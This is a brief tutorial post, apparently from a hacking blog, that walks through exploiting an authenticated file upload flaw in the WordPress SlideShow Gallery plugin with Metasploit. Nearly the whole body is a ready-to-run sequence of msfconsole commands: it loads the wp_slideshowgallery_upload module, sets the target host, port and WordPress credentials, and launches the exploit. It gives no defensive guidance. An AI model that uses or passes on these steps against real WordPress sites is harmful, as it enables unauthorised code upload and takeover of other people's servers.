Exploit WordPress using SlideShow Gallery Authenticated File Upload

The WordPress SlideShow Gallery plugin contains an authenticated file upload vulnerability. An attacker can upload arbitrary files to the upload folder. Since the plugin uses its own file upload mechanism instead of the WordPress API, it’s possible to upload any file type.

 Exploit Targets

wordpress

Requirement

Attacker: kali Linux

Victim PC: WordPress

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_slideshowgallery_upload

msf exploit (wp_slideshowgallery_upload)>set targeturi /

msf exploit (wp_slideshowgallery_upload)>set rhost 192.168.0.104 (IP of Remote Host)

msf exploit (wp_slideshowgallery_upload)>set rport 80

msf exploit (wp_slideshowgallery_upload)>set wp_user user

msf exploit (wp_slideshowgallery_upload)>set wp_password bitnami

msf exploit (wp_slideshowgallery_upload)>exploit          

2 Comments Exploit WordPress using SlideShow Gallery Authenticated File Upload

Leave a Reply

Your email address will not be published. Required fields are marked *